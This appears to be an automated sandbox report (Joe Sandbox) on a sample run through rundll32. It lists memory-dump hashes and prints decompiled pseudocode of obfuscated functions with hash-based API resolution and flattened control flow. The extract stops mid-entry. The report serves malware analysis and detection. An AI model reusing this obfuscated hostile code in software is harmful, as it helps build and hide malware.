                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )/$mh.$q:
                                                                      • API String ID: 0-1096206879
                                                                      • Opcode ID: faa8d97aed7430308da457e4245d4afb6c19da8b4dae1242b9d781458652ed5d
                                                                      • Instruction ID: cd6d67532699a8518d8cad92d337052e59f17a99f9b19cf13507a1961bdd0c99
                                                                      • Opcode Fuzzy Hash: faa8d97aed7430308da457e4245d4afb6c19da8b4dae1242b9d781458652ed5d
                                                                      • Instruction Fuzzy Hash: 8F410272D0021DEBEF09CFA1C94A8DEBFB2FB48314F108158E911762A0D7B90A55DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: i#$z"$|2
                                                                      • API String ID: 0-585385020
                                                                      • Opcode ID: fe226a8a923b63f17ed5cb043c32f7a565b0df65fb12a0d1d977b04ae3c82b13
                                                                      • Instruction ID: 733b59e6853c89347aa9a9e1b2d0037e47a1806f7bbbb44bbaa0abfd0869f10f
                                                                      • Opcode Fuzzy Hash: fe226a8a923b63f17ed5cb043c32f7a565b0df65fb12a0d1d977b04ae3c82b13
                                                                      • Instruction Fuzzy Hash: F33104B5D1021DEFEF48DFA4C94A4EEBBB5FB44304F108059EA11B6260D3B84A15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +,"$i#$oZ
                                                                      • API String ID: 0-2199921167
                                                                      • Opcode ID: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
                                                                      • Instruction ID: 60776dee6b3678e5df2179adf4e1648d32e2816c16b3a96aedfd0de3c431d836
                                                                      • Opcode Fuzzy Hash: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
                                                                      • Instruction Fuzzy Hash: A1314471D10609EBDB08CFA5DA8A99EFBB0FB40718F208599D406B7250D3B46B98DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E01FF327F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                      				unsigned int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t46;
                                                                      				intOrPtr* _t56;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      				void* _t66;
                                                                      
                                                                      				_t66 = __ecx;
                                                                      				E02002550(_t46);
                                                                      				_v20 = 0x3156;
                                                                      				_v20 = _v20 << 0xe;
                                                                      				_v20 = _v20 ^ 0x0c55a35f;
                                                                      				_v12 = 0x42ee;
                                                                      				_t59 = 0x54;
                                                                      				_v12 = _v12 / _t59;
                                                                      				_v12 = _v12 >> 6;
                                                                      				_v12 = _v12 >> 4;
                                                                      				_v12 = _v12 ^ 0x00000e02;
                                                                      				_v8 = 0x7d69;
                                                                      				_v8 = _v8 >> 0xc;
                                                                      				_v8 = _v8 >> 2;
                                                                      				_v8 = _v8 >> 0xb;
                                                                      				_v8 = _v8 ^ 0x00007fcf;
                                                                      				_v16 = 0xcf80;
                                                                      				_v16 = _v16 >> 2;
                                                                      				_t60 = 0x65;
                                                                      				_v16 = _v16 / _t60;
                                                                      				_v16 = _v16 ^ 0x000022b9;
                                                                      				_t56 = E01FF7378(_t60, 0x92ff481d, _t60, 0x90f109b3, 0x80);
                                                                      				return  *_t56(_t66, _a4, __ecx, __edx, _a4, _a8);
                                                                      			}
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V1$i}$B
                                                                      • API String ID: 0-126001315
                                                                      • Opcode ID: e9ea08993b24c1a24ae5d337309e7aa82eff9c3c9ebb2c494d47034f813f44ed
                                                                      • Instruction ID: 91a9f477aff46192475a48dc03283e3f3b9d8e0dc9b9ca2fa029976f196b2fa3
                                                                      • Opcode Fuzzy Hash: e9ea08993b24c1a24ae5d337309e7aa82eff9c3c9ebb2c494d47034f813f44ed
                                                                      • Instruction Fuzzy Hash: BA112676D0060CBBEB09DFD5C84A8DEBBB1EB44708F10C189E914A7284D7B56B58CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V1$i}$B
                                                                      • API String ID: 0-126001315
                                                                      • Opcode ID: e53405ebcaadf61612096404f00133a13c00ecb254a195ec2e8729eab100b819
                                                                      • Instruction ID: 59d276b5e3be4e258d77933f1b1587257614f90a4e147a0619c01ebe970a2837
                                                                      • Opcode Fuzzy Hash: e53405ebcaadf61612096404f00133a13c00ecb254a195ec2e8729eab100b819
                                                                      • Instruction Fuzzy Hash: 81111476D0020CBBEB09DFD5C80A8DEBBB5EB44708F10C089E914A7285D7B55B58CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +,"$i#$oZ
                                                                      • API String ID: 0-2199921167
                                                                      • Opcode ID: bf2bae43fa27af6f261db997c93353eed6f3a7671df8ad2c815519cc70e3ba68
                                                                      • Instruction ID: d14a7a481e430117c04287a884c5469bf7d9d6001e96118d04f1a816ef8c31df
                                                                      • Opcode Fuzzy Hash: bf2bae43fa27af6f261db997c93353eed6f3a7671df8ad2c815519cc70e3ba68
                                                                      • Instruction Fuzzy Hash: 1321F371D14619EBDB08CFA5D98A9DEFBB0FB40758F208599C115B7250D3B85B48CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E02004C37(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                      				char _v16;
                                                                      				char _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				void* _t135;
                                                                      				signed int _t149;
                                                                      				void* _t150;
                                                                      				signed int _t153;
                                                                      				char _t156;
                                                                      				signed int _t157;
                                                                      				void* _t160;
                                                                      				char* _t166;
                                                                      				void* _t181;
                                                                      				signed int _t182;
                                                                      				signed int _t183;
                                                                      				signed int _t184;
                                                                      				signed int _t185;
                                                                      				signed int _t186;
                                                                      				signed int* _t191;
                                                                      
                                                                      				_push(_a8);
                                                                      				_t181 = __ecx;
                                                                      				_push(_a4);
                                                                      				_push(0x40);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t135);
                                                                      				_v20 = 0x10;
                                                                      				_t191 =  &(( &_v76)[4]);
                                                                      				_v72 = 0x33a2;
                                                                      				_t157 = 0;
                                                                      				_t160 = 0x15bff311;
                                                                      				_t182 = 0x47;
                                                                      				_v72 = _v72 / _t182;
                                                                      				_v72 = _v72 + 0x9922;
                                                                      				_v72 = _v72 >> 4;
                                                                      				_v72 = _v72 ^ 0x00004e71;
                                                                      				_v52 = 0xaaa1;
                                                                      				_v52 = _v52 << 9;
                                                                      				_v52 = _v52 ^ 0x01552e09;
                                                                      				_v76 = 0x962f;
                                                                      				_v76 = _v76 << 2;
                                                                      				_v76 = _v76 + 0xc5a1;
                                                                      				_v76 = _v76 + 0xb22d;
                                                                      				_v76 = _v76 ^ 0x0003d8ea;
                                                                      				_v40 = 0xc003;
                                                                      				_v40 = _v40 << 1;
                                                                      				_v40 = _v40 ^ 0x0001b379;
                                                                      				_v44 = 0x4990;
                                                                      				_t183 = 0x43;
                                                                      				_v44 = _v44 / _t183;
                                                                      				_v44 = _v44 ^ 0x000010a0;
                                                                      				_v48 = 0xc7fb;
                                                                      				_v48 = _v48 + 0xffffc7ce;
                                                                      				_v48 = _v48 ^ 0x0000a883;
                                                                      				_v36 = 0x594;
                                                                      				_v36 = _v36 | 0x90aa143f;
                                                                      				_v36 = _v36 ^ 0x90aa6018;
                                                                      				_v28 = 0x8261;
                                                                      				_v28 = _v28 >> 0xc;
                                                                      				_v28 = _v28 ^ 0x0000298c;
                                                                      				_v32 = 0xe41c;
                                                                      				_v32 = _v32 + 0xffff1d18;
                                                                      				_v32 = _v32 ^ 0x00004603;
                                                                      				_v68 = 0xf178;
                                                                      				_v68 = _v68 ^ 0xb2146a6f;
                                                                      				_v68 = _v68 << 0xd;
                                                                      				_v68 = _v68 + 0xffff14e1;
                                                                      				_v68 = _v68 ^ 0x9361c313;
                                                                      				_v60 = 0xf75;
                                                                      				_t184 = 7;
                                                                      				_v60 = _v60 / _t184;
                                                                      				_v60 = _v60 + 0xffffaefc;
                                                                      				_v60 = _v60 ^ 0xffffe5ce;
                                                                      				_v56 = 0xf098;
                                                                      				_t185 = 0x29;
                                                                      				_v56 = _v56 / _t185;
                                                                      				_v56 = _v56 >> 0xa;
                                                                      				_v56 = _v56 ^ 0x0000430d;
                                                                      				_v24 = 0x878b;
                                                                      				_t186 = 0x32;
                                                                      				_v24 = _v24 / _t186;
                                                                      				_v24 = _v24 ^ 0x000010f8;
                                                                      				_v64 = 0xb5f1;
                                                                      				_v64 = _v64 << 1;
                                                                      				_v64 = _v64 + 0xd2ca;
                                                                      				_v64 = _v64 * 0x3b;
                                                                      				_v64 = _v64 ^ 0x00840c1f;
                                                                      				L1:
                                                                      				while(_t160 != 0xc9ebeee) {
                                                                      					if(_t160 == 0x15bff311) {
                                                                      						_t160 = 0xc9ebeee;
                                                                      						continue;
                                                                      					}
                                                                      					if(_t160 == 0x185136eb) {
                                                                      						_push(0x1ff1484);
                                                                      						_push(_v48);
                                                                      						_t150 = E0200CF31(_v40, _v44, __eflags);
                                                                      						E01FFA6C9(__eflags);
                                                                      						_t153 = E0200990C(_v28, __eflags, _v32, _v68, 0x40, _v60, _t181,  &_v16, _t150);
                                                                      						__eflags = _t153;
                                                                      						_t133 = _t153 > 0;
                                                                      						__eflags = _t133;
                                                                      						_t157 = 0 | _t133;
                                                                      						E02000D6D(_v56, _v24, _v64, _t150);
                                                                      						L22:
                                                                      						return _t157;
                                                                      					}
                                                                      					if(_t160 != 0x2cfa89b3) {
                                                                      						L19:
                                                                      						__eflags = _t160 - 0x12976092;
                                                                      						if(__eflags != 0) {
                                                                      							continue;
                                                                      						}
                                                                      						goto L22;
                                                                      					}
                                                                      					_t166 =  &_v16;
                                                                      					if(_v16 == _t157) {
                                                                      						L14:
                                                                      						_t160 = 0x185136eb;
                                                                      						continue;
                                                                      					} else {
                                                                      						goto L6;
                                                                      					}
                                                                      					do {
                                                                      						L6:
                                                                      						_t156 =  *_t166;
                                                                      						if(_t156 < 0x30 || _t156 > 0x39) {
                                                                      							if(_t156 < 0x61 || _t156 > 0x7a) {
                                                                      								if(_t156 < 0x41 || _t156 > 0x5a) {
                                                                      									 *_t166 = 0x58;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t166 = _t166 + 1;
                                                                      					} while ( *_t166 != _t157);
                                                                      					goto L14;
                                                                      				}
                                                                      				_t149 = E0200226D( &_v20, _v72, _v52, _v76,  &_v16);
                                                                      				_t191 =  &(_t191[3]);
                                                                      				__eflags = _t149;
                                                                      				if(__eflags == 0) {
                                                                      					_t160 = 0x12976092;
                                                                      					goto L19;
                                                                      				}
                                                                      				_t160 = 0x2cfa89b3;
                                                                      				goto L1;
                                                                      			}
                                                                      0x02004e5e
                                                                      0x00000000
                                                                      0x02004e5e
                                                                      0x02004e24
                                                                      0x02004e9d
                                                                      0x02004ea2
                                                                      0x02004eae
                                                                      0x02004eb9
                                                                      0x02004ed9
                                                                      0x02004ee0
                                                                      0x02004eeb
                                                                      0x02004eeb
                                                                      0x02004eeb
                                                                      0x02004ef2
                                                                      0x02004efd
                                                                      0x02004f03
                                                                      0x02004f03
                                                                      0x02004e2c
                                                                      0x02004e8f
                                                                      0x02004e8f
                                                                      0x02004e95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02004e9b
                                                                      0x02004e2e
                                                                      0x02004e36
                                                                      0x02004e5a
                                                                      0x02004e5a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02004e38
                                                                      0x02004e38
                                                                      0x02004e38
                                                                      0x02004e3c
                                                                      0x02004e44
                                                                      0x02004e4c
                                                                      0x02004e52
                                                                      0x02004e52
                                                                      0x02004e4c
                                                                      0x02004e44
                                                                      0x02004e55
                                                                      0x02004e56
                                                                      0x00000000
                                                                      0x02004e38
                                                                      0x02004e77
                                                                      0x02004e7c
                                                                      0x02004e7f
                                                                      0x02004e81
                                                                      0x02004e8a
                                                                      0x00000000
                                                                      0x02004e8a
                                                                      0x02004e83
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C$qN
                                                                      • API String ID: 0-790040163
                                                                      • Opcode ID: 4adea902eccb2d5c3e9ddf963b6978523b0ceeadc5e16dbefd8d5871c3203429
                                                                      • Instruction ID: cfb9e437a3265d2c262128c205c5904fdbed8432f68a347e908b31ecd2ef1a96
                                                                      • Opcode Fuzzy Hash: 4adea902eccb2d5c3e9ddf963b6978523b0ceeadc5e16dbefd8d5871c3203429
                                                                      • Instruction Fuzzy Hash: FC7187715083819FE354CF26C98855FBBE2EBC5B18F40491CF295862A0D7B5CA0ADF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C$qN
                                                                      • API String ID: 0-790040163
                                                                      • Opcode ID: 3664b42d23cba470b360c6ad181b5cbbd14683b7db110bcae712de3154e60996
                                                                      • Instruction ID: db0136545eb7e86a3a891072699514cc98e2b1ae3095e6700b1611c6bfa4fcdc
                                                                      • Opcode Fuzzy Hash: 3664b42d23cba470b360c6ad181b5cbbd14683b7db110bcae712de3154e60996
                                                                      • Instruction Fuzzy Hash: 1271B7711183019FE358DF26C98961FBBE1EBC0B08F50895CF181862A0C3B5CA5ACF83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E01FF57D4(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                      				char _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				signed int _v84;
                                                                      				unsigned int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				signed int _v120;
                                                                      				signed int _v124;
                                                                      				signed int _v128;
                                                                      				void* __ecx;
                                                                      				void* _t131;
                                                                      				intOrPtr _t147;
                                                                      				signed int _t154;
                                                                      				signed int _t155;
                                                                      				signed int _t156;
                                                                      				void* _t159;
                                                                      				intOrPtr* _t177;
                                                                      				void* _t179;
                                                                      				void* _t180;
                                                                      
                                                                      				_t177 = _a4;
                                                                      				_t176 = _a16;
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_t177);
                                                                      				_push(__edx);
                                                                      				E02002550(_t131);
                                                                      				_v80 = 0x4cb2ed;
                                                                      				_v76 = 0;
                                                                      				_t180 = _t179 + 0x18;
                                                                      				_v72 = 0;
                                                                      				_v108 = 0x9c5c;
                                                                      				_t159 = 0x3368839;
                                                                      				_v108 = _v108 ^ 0xd3e57123;
                                                                      				_v108 = _v108 ^ 0x4ad8fda9;
                                                                      				_v108 = _v108 ^ 0x993d5beb;
                                                                      				_v88 = 0xf9a5;
                                                                      				_v88 = _v88 >> 0x10;
                                                                      				_v88 = _v88 ^ 0x0000103e;
                                                                      				_v120 = 0xbbb7;
                                                                      				_t154 = 0x79;
                                                                      				_v120 = _v120 / _t154;
                                                                      				_v120 = _v120 + 0xffffc937;
                                                                      				_v120 = _v120 ^ 0xd13f0730;
                                                                      				_v120 = _v120 ^ 0x2ec0cb4d;
                                                                      				_v104 = 0xc6c8;
                                                                      				_v104 = _v104 | 0xbfb93240;
                                                                      				_v104 = _v104 << 8;
                                                                      				_v104 = _v104 ^ 0xb9f6c47b;
                                                                      				_v124 = 0xc4b4;
                                                                      				_v124 = _v124 + 0x286;
                                                                      				_t155 = 0x5f;
                                                                      				_v124 = _v124 * 0xf;
                                                                      				_v124 = _v124 + 0x3b2;
                                                                      				_v124 = _v124 ^ 0x000bab89;
                                                                      				_v128 = 0xc484;
                                                                      				_v128 = _v128 + 0xba23;
                                                                      				_v128 = _v128 >> 4;
                                                                      				_v128 = _v128 | 0x65c5919c;
                                                                      				_v128 = _v128 ^ 0x65c5d8de;
                                                                      				_v100 = 0x428;
                                                                      				_v100 = _v100 << 6;
                                                                      				_v100 = _v100 << 0xe;
                                                                      				_v100 = _v100 ^ 0x4280342d;
                                                                      				_v116 = 0x3c02;
                                                                      				_v116 = _v116 << 4;
                                                                      				_v116 = _v116 / _t155;
                                                                      				_t156 = 0x15;
                                                                      				_v116 = _v116 / _t156;
                                                                      				_v116 = _v116 ^ 0x000042c4;
                                                                      				_v84 = 0x30d9;
                                                                      				_v84 = _v84 ^ 0x97ed8beb;
                                                                      				_v84 = _v84 ^ 0x97eda4f0;
                                                                      				_v92 = 0x87d4;
                                                                      				_v92 = _v92 + 0xffff3816;
                                                                      				_v92 = _v92 << 6;
                                                                      				_v92 = _v92 ^ 0xffefeeaa;
                                                                      				_v96 = 0xe0b5;
                                                                      				_v96 = _v96 * 0x4f;
                                                                      				_v96 = _v96 + 0xffff6770;
                                                                      				_v96 = _v96 ^ 0x0044a5e8;
                                                                      				_v112 = 0x5d17;
                                                                      				_v112 = _v112 ^ 0xac640b72;
                                                                      				_v112 = _v112 + 0xffff1fa4;
                                                                      				_v112 = _v112 << 7;
                                                                      				_v112 = _v112 ^ 0x31bb0480;
                                                                      				do {
                                                                      					while(_t159 != 0x3368839) {
                                                                      						if(_t159 == 0x227ced25) {
                                                                      							E01FFF834( *_t176, _v100,  &_v68, _v116);
                                                                      							_t180 = _t180 + 8;
                                                                      							_t159 = 0x333b911b;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t159 == 0x240f0f59) {
                                                                      								E01FFFEE3(_t177,  &_v68, _v120, _v104, _v124, _v128);
                                                                      								_t180 = _t180 + 0x10;
                                                                      								_t159 = 0x227ced25;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t159 == 0x25527f2b) {
                                                                      									_push(_t159);
                                                                      									_t147 = E01FF54FB( *(_t177 + 4));
                                                                      									 *_t177 = _t147;
                                                                      									__eflags = _t147;
                                                                      									if(__eflags != 0) {
                                                                      										_t159 = 0x240f0f59;
                                                                      										continue;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t159 == 0x303334f6) {
                                                                      										 *(_t177 + 4) = E02000672(_t176);
                                                                      										_t159 = 0x25527f2b;
                                                                      										continue;
                                                                      									} else {
                                                                      										_t188 = _t159 - 0x333b911b;
                                                                      										if(_t159 != 0x333b911b) {
                                                                      											goto L15;
                                                                      										} else {
                                                                      											E01FFBAD2(_v84, _v92, _t188, _t176 + 4,  &_v68, _v96);
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L8:
                                                                      						return 0 |  *_t177 != 0x00000000;
                                                                      					}
                                                                      					_t159 = 0x303334f6;
                                                                      					 *_t177 = 0;
                                                                      					 *(_t177 + 4) = _v112;
                                                                      					L15:
                                                                      					__eflags = _t159 - 0x19576d5a;
                                                                      				} while (__eflags != 0);
                                                                      				goto L8;
                                                                      			}






























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %|"$%|"
                                                                      • API String ID: 0-2582732878
                                                                      • Opcode ID: 60e29652dc2165e8f256d14fa822249d67059f5fe67010c7fe92581947bf8306
                                                                      • Instruction ID: fab0312c6384c575caab7b6b3eadc9ed091e8227830ea2a4c6cc227325d565b6
                                                                      • Opcode Fuzzy Hash: 60e29652dc2165e8f256d14fa822249d67059f5fe67010c7fe92581947bf8306
                                                                      • Instruction Fuzzy Hash: 5C715571109341AFE768CF65C98981FBBE1BFC4718F409A1DF2C696260C7B58A49CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %|"$%|"
                                                                      • API String ID: 0-2582732878
                                                                      • Opcode ID: dcf0d0cf0a998f2391e1bfd2c442f01b02ad6d522a666d75066037e3d3353ea2
                                                                      • Instruction ID: 8ef152a648dc22ca9aa889e6764a6220961d42fa82fd4b6a84efa9d0dfc48b07
                                                                      • Opcode Fuzzy Hash: dcf0d0cf0a998f2391e1bfd2c442f01b02ad6d522a666d75066037e3d3353ea2
                                                                      • Instruction Fuzzy Hash: 137176B11193019FD798DF21C98981FBBE1BFC8708F549A1DF1CA96260C7B49A59CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E01FF2208(intOrPtr* __ecx) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				intOrPtr _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				char _v332;
                                                                      				char _t130;
                                                                      				void* _t131;
                                                                      				void* _t135;
                                                                      				signed int _t137;
                                                                      				signed int _t138;
                                                                      				signed int _t139;
                                                                      				char* _t140;
                                                                      				intOrPtr* _t156;
                                                                      
                                                                      				_v60 = _v60 & 0x00000000;
                                                                      				_v72 = 0xe3568;
                                                                      				_v68 = 0x2883ad;
                                                                      				_v64 = 0x1a7bf3;
                                                                      				_v44 = 0xf414;
                                                                      				_v44 = _v44 ^ 0x8770b590;
                                                                      				_v44 = _v44 ^ 0x87700964;
                                                                      				_v36 = 0xb854;
                                                                      				_v36 = _v36 << 7;
                                                                      				_v36 = _v36 ^ 0x005c6a34;
                                                                      				_v12 = 0x1e6f;
                                                                      				_v12 = _v12 ^ 0xf4069a1b;
                                                                      				_v12 = _v12 << 0xd;
                                                                      				_t156 = __ecx;
                                                                      				_t137 = 0x57;
                                                                      				_v12 = _v12 / _t137;
                                                                      				_v12 = _v12 ^ 0x0265e4d2;
                                                                      				_v24 = 0x8571;
                                                                      				_v24 = _v24 + 0xffff3aa5;
                                                                      				_v24 = _v24 | 0x45c7521f;
                                                                      				_v24 = _v24 ^ 0xffffa68c;
                                                                      				_v56 = 0xe2bc;
                                                                      				_v56 = _v56 + 0xac59;
                                                                      				_v56 = _v56 ^ 0x0001c024;
                                                                      				_v28 = 0xc379;
                                                                      				_v28 = _v28 >> 5;
                                                                      				_v28 = _v28 >> 5;
                                                                      				_v28 = _v28 ^ 0x00005cee;
                                                                      				_v32 = 0x29f6;
                                                                      				_t138 = 0x70;
                                                                      				_v32 = _v32 / _t138;
                                                                      				_t139 = 0x16;
                                                                      				_t140 =  &_v332;
                                                                      				_v32 = _v32 / _t139;
                                                                      				_v32 = _v32 ^ 0x0000381e;
                                                                      				_v20 = 0x6921;
                                                                      				_v20 = _v20 ^ 0xc84b8620;
                                                                      				_v20 = _v20 ^ 0xee2afc44;
                                                                      				_v20 = _v20 * 0x68;
                                                                      				_v20 = _v20 ^ 0x976f8b66;
                                                                      				_v52 = 0x2d40;
                                                                      				_v52 = _v52 + 0xe0f;
                                                                      				_v52 = _v52 ^ 0x00002a29;
                                                                      				_v48 = 0x9fae;
                                                                      				_v48 = _v48 >> 3;
                                                                      				_v48 = _v48 ^ 0x00003426;
                                                                      				_v8 = 0x1268;
                                                                      				_v8 = _v8 + 0xffffad14;
                                                                      				_v8 = _v8 + 0xfbd;
                                                                      				_v8 = _v8 | 0x03aa70af;
                                                                      				_v8 = _v8 ^ 0xffff927e;
                                                                      				_v40 = 0x43b2;
                                                                      				_v40 = _v40 >> 5;
                                                                      				_v40 = _v40 ^ 0x00005849;
                                                                      				_v16 = 0x2e64;
                                                                      				_v16 = _v16 | 0x5ee4e259;
                                                                      				_v16 = _v16 * 0x35;
                                                                      				_v16 = _v16 >> 0x10;
                                                                      				_v16 = _v16 ^ 0x0000e727;
                                                                      				while(1) {
                                                                      					_t130 =  *_t156;
                                                                      					if(_t130 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t130 == 0x2e) {
                                                                      						 *_t140 = 0;
                                                                      					} else {
                                                                      						 *_t140 = _t130;
                                                                      						_t140 = _t140 + 1;
                                                                      						_t156 = _t156 + 1;
                                                                      						continue;
                                                                      					}
                                                                      					L6:
                                                                      					_t131 = E0200A03C( &_v332, _v44, _v36, _v12, _v24);
                                                                      					_t157 = _t131;
                                                                      					if(_t131 != 0) {
                                                                      						L8:
                                                                      						_push(E02001D2B(_v32, _t156 + 1, _v20, _v52) ^ 0x0c5c2292);
                                                                      						_push(_v16);
                                                                      						_push(_v40);
                                                                      						_push(_v8);
                                                                      						return E0200C4DD(_v48, _t157);
                                                                      					}
                                                                      					_t135 = E01FFF04C( &_v332, _v56, _v28);
                                                                      					_t157 = _t135;
                                                                      					if(_t135 != 0) {
                                                                      						goto L8;
                                                                      					}
                                                                      					return _t135;
                                                                      				}
                                                                      				goto L6;
                                                                      			}






























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4j\$Y^
                                                                      • API String ID: 0-2203625362
                                                                      • Opcode ID: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
